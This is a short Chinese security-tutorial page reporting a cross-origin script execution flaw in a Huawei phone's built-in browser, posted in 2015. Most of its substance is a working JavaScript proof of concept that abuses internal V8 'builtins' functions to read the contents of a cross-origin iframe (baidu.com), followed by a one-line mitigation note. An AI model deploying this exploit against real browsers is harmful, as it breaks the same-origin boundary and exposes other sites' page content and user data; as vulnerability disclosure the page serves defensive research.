网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

华为手机自带浏览器跨域脚本执行漏洞(附poc) - 网站安全 - 自学php网

来源:未知    时间:2015-04-15 13:40 作者:xxadmin 阅读:

[导读] bodyscriptframe = document.body.appendChild(document.createElement(iframe));frame.src = http://www.baidu.com/;frame.onload = function() {Function(}, (builtins = this), function() {);originalInstantiate = builtins.Instantiate;builtins.Define...

 

20150224_172726.png


 

20150224_165343.png
 

<body>

<script>

frame = document.body.appendChild(document.createElement("iframe"));

frame.src = "http://www.baidu.com/";



frame.onload = function() {

Function("}, (builtins = this), function() {");

originalInstantiate = builtins.Instantiate;

builtins.DefineOneShotAccessor(builtins, "Instantiate", function() {});

flag = 0;

template = null;

builtins.Instantiate = function(x, y) {

if (flag) {

doc = frame.contentWindow.document;

alert(doc.body.innerHTML);

flag = 0;

} else if (!template)

template = x;



return originalInstantiate(x, y);

};

document.implementation;

flag = 1;

builtins.ConfigureTemplateInstance(frame.contentWindow, template);

}

</script>

</body>

解决方案:

对builtins对象执行脚本进行限制

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论